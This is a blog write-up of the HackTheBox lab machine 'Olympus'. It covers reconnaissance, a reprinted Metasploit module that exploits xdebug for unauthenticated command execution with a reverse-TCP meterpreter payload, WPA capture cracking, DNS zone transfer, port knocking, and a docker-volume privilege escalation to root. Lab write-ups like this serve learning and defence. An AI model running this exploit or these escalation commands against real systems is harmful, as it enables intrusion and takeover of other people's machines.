HackTheBox Writeup — Olympus

Olympus

Hello Guys , I am Faisal Husaini and this is my writeup on Medium for Olympus machine which has retired and also this was my favorite box on HTB. My username on HTB is “faisalelino” .

This writeup is on Olympus box which is one of the hardest box on HTB. But the experience was great while solving this machine as I learned about alot of stuffs while solving this machine.

The IP for this machine is 10.10.10.83, so let’s get started

First we do nmap scan using the command “nmap -sC -sV -oA nmap 10.10.10.83”

# Nmap 7.70 scan initiated Sun Jun 10 02:19:00 2018 as: nmap -sC -sV -oA nmap 10.10.10.83
Nmap scan report for 10.10.10.83
Host is up (0.19s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
53/tcp open domain (unknown banner: Bind)
| dns-nsid:
|_ bind.version: Bind
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
| bind
|_ Bind
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Crete island — Olympus HTB
85/tcp filtered mit-ml-dev
144/tcp filtered news
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-City of olympia
| ssh-hostkey:
| 2048 f2:ba:db:06:95:00:ec:05:81:b0:93:60:32:fd:9e:00 (RSA)
| 256 79:90:c0:3d:43:6c:8d:72:19:60:45:3c:f8:99:14:bb (ECDSA)
|_ 256 f8:5b:2e:32:95:03:12:a3:3b:40:c5:11:27:ca:71:52 (ED25519)
4004/tcp filtered pxc-roid
9040/tcp filtered tor-trans
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port53-TCP:V=7.70%I=7%D=6/10%Time=5B1C3D7C%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,3F,”\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04Bind\xc0\x0c\
SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c”);
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2222-TCP:V=7.70%I=7%D=6/10%Time=5B1C3D77%P=x86_64-pc-linux-gnu%r(NU
SF:LL,29,”SSH-2\.0-City\x20of\x20olympia\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\r\n”);

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 10 02:20:18 2018–1 IP address (1 host up) scanned in 78.87 seconds

We see port 22 for ssh is filtered , also port 80 is open , so lets open the IP in browser

Nothing interesting here………. Let’s look at the source code too

Source Code of http://10.10.10.83

We see here nothing much important in the http , neither we got something from its source code , so its time for dirb scan

Dirb Results

We dont get anything much of use from dirb , so its time to run nikto on http://10.10.10.83/

Nikto Results

Nikto says uncommon header ‘xdebug’ found , so now lets google about it

About XDebug
XDebug

As this was given about xdebug on its official website , so lets find for its exploit if any

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
include Rex::Proto::Http
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘xdebug Unauthenticated OS Command Execution’,
‘Description’ => %q{
Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
This allows the attacker to execute arbitrary php code as the context of the web user.
},
‘DisclosureDate’ => ‘Sep 17 2017’,
‘Author’ => [
‘Ricter Zheng’, #Discovery https://twitter.com/RicterZ
‘Taki Tachibana’, # MinatoTW
‘Mumbai’ # Austin Hudson
],
‘References’ => [
[‘URL’, ‘https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
[‘URL’, ‘https://paper.seebug.org/397/']
],
‘License’ => MSF_LICENSE,
‘Platform’ => ‘php’,
‘Arch’ => [ARCH_PHP],
‘DefaultTarget’ => 0,
‘Stance’ => Msf::Exploit::Stance::Aggressive,
‘DefaultOptions’ => {
‘PAYLOAD’ => ‘php/meterpreter/reverse_tcp’
},
‘Payload’ => {
‘DisableNops’ => true,
},
‘Targets’ => [[ ‘Automatic’, {} ]],
))

register_options([
OptString.new(‘PATH’, [ true, “Path to target webapp”, “/index.php”]),
OptAddress.new(‘SRVHOST’, [ true, “Callback host for accepting connections”, “0.0.0.0”]),
OptInt.new(‘SRVPORT’, [true, “Port to listen for the debugger”, 9000]),
Opt::RPORT(80),
OptString.new(‘WriteableDir’, [ true, “A writeable directory on the target”, “/tmp”])
])
end

def check
begin
res = send_request_cgi({
‘uri’ => datastore[“PATH”],
‘method’ => ‘GET’,
‘vars_get’ => {
‘XDEBUG_SESSION_START’ => rand_text_alphanumeric(10)
}
})
vprint_status “Request sent\n#{res.headers}”
if res && res.headers.to_s =~ /XDEBUG/i
vprint_good(“Looks like remote server has xdebug enabled\n”)
return CheckCode::Detected
else
return CheckCode::Safe
end
rescue Rex::ConnectionError
return CheckCode::Unknown
end
end

def exploit
payl = Rex::Text.encode_base64(“#{payload.encoded}”)
file = “#{datastore[‘WriteableDir’]}”+”/”+rand_text_alphanumeric(5)
cmd1 = “eval -i 1 — “ + Rex::Text.encode_base64(“file_put_contents(\”#{file}\”,base64_decode(\”#{payl}\”)) && system(\” php #{file} \”)”) + “\x00”
webserver = Thread.new do
begin
server = Rex::Socket::TcpServer.create(
‘LocalPort’ => datastore[‘SRVPORT’],
‘LocalHost’ => datastore[‘SRVHOST’],
‘Context’ => {
‘Msf’ => framework,
‘MsfExploit’ => self
})

client = server.accept
print_status(“Waiting for client response.”)
data = client.recv(1024)
print_status(“Receiving response”)
vprint_line(data)
print_status(“Shell might take upto a minute to respond.Please be patient.”)
print_status(“Sending payload of size #{cmd1.length} bytes”)
register_file_for_cleanup(file)
client.write(cmd1)
client.close
server.close
webserver.exit
ensure
webserver.exit
end
end
send_request_cgi({
‘uri’ => datastore[‘PATH’],
‘method’ => ‘GET’,
‘headers’ => {
‘X-Forwarded-For’ => “#{lhost}”,
‘Cookie’ => ‘XDEBUG_SESSION=’+rand_text_alphanumeric(10)
}
})
end
end

We have to set RHOST which is 10.10.10.83 and LHOST to our tun0 IP address and then run the exploit command

Meterpreter

Bingo.!! We got meterpreter , now lets move on and see the contents

Nothing much here , lets see the contents of Zeus user

We see something much like git folders , airgeddon.sh , a folder name captured etc..

Let’s see the contents of airgeddon.sh , we see that its very length bash script code , so nothing interesting there , now let’s dive to captured folder

We got a .cap file , we download it using our meterpreter shell.

Now lets crack this captured.cap file using aircrack

Cracking CAP file using Aircrack-ng

We crack the captured.cap file using the tool aircrack-ng

Command Used : aircrack-ng captured.cap -w rockyou.txt , and then we wait for the cracking to get finished

aircrack-ng

We got the key , which is “flightoficarus”

This was bit tricky to understand , then I came to know the word Icarus seems to be like greek which this box is based on , and that also from
nmap results we saw that ssh is open on port 2222 , so Icarus maybe the username , but what about password?

After asking a hint from my friend , he told me to see the captured.cap file , so i thought that the word “captured” maybe the password , but no..!!

Then Iopened the captured.cap file using Wireshark

We see something as a sentence , that maybe the password , so the sentence was like “Too_cl0se_to_th3_Sun” , now we copy this and connect to ssh

We connect to ssh using this command:

ssh icarus@10.10.10.83 -p2222

ssh connection successful

Bingo we got in to ssh , lets see whats inside the home folder by “ls” command

We see a txt file name help_of_the_gods.txt and inside it we got a dns , so i will copy it to my /etc/hosts file with the IP of 10.10.10.83

I tried alot of things , which when doing ctfolympus.htb on the browser , it was displaying the same thing as when we were doing using the IP

So after talking a help from my friend , he told me to use dig

So Iused dig with “dig axfr ctfolympus.htb @10.10.10.83” , we get

Zone Transfers

In the txt area we see “St34l_th3_F1re!” which was similar to the password style for Icarus we got from captured.cap

But what about username , we see that “prometheus” from the same txt area , but when we tried it on port 2222 of ssh , it failed to connect

Also port 22 was filtered , then I didnt knew about port knocking , which my friend gave me help by saying to watch Ippsec’s Nineveh video

So from that Ilearn about port knocking and now we got to that part

I create a simple bash command for the port knocking

After watching the nineveh video from Ippsec , I saw that he used 3 ports from iptables or something , which I didn’t had in this box

So what to do????

Remember the txt area we got from dig , I said portal to Hades and then was 3 numbers

portal

These are the 3 ports to be used for port knocking , i.e, 3456 , 8234, 62431

So I used this command for knocking and also directly connect to ssh on port 22

for i in 3456 8234 62431; do nmap -Pn -p $i — host-timeout 201 — max-retries 0 10.10.10.83; done; ssh prometheus@10.10.10.83

Port Knocking SSH

Now it connects to ssh without saying the port being filtered , now we enter the password which was “St34l_th3_F1re!”

Connection Successful

And we get in , now lets get the user flag

User flag was in the same directory , so when we do the ls command and then cat “user.txt” , we get the flag

User Flag

Bingo , now time for root

Lets import the LinEnum.sh script from my local machine and then run and see the results

We were not able to run sudo command as prometheus , so after the script execution complete , we saw only 1 thing interesting

LinEnum.sh

The user was hosting docker , which maybe a hint to docker privilege escalation , so after searching on google for docker privilege escalation , I got

docker run [tab tab] to see the images
docker run -t -i olympia /bin/bash
docker run -v /root:/root -i -t olympia /bin/bash

So Iran the last command and then got the root flag

Docker Priv Esc

We got root , now its time to get root flag which is located in /root/root.txt

Remember the 3 commands for docker which Igave above , use the 3rd one to get the flag

Root Flag

This machine was really very awesome and I gained alot of knowledge from it like Port Knocking , Docker Priv Esc etc.

  1. XDebug Exploitation
  2. Zone Transfers
  3. Port Knocking
  4. Docker Privelege Escalation

References

XDebug Exploit by MinatoTW on HTB → https://www.exploit-db.com/exploits/44568/

Ippsec’s Nineveh Video for Port Knocking → https://www.youtube.com/watch?v=K9DKULxSBK4

Docker Privelege Escalation → https://fosterelli.co/privilege-escalation-via-docker.html

Hacker | Bug Hunter | Python Coder | Gamer | Reverse Engineering Lover

Get the Medium app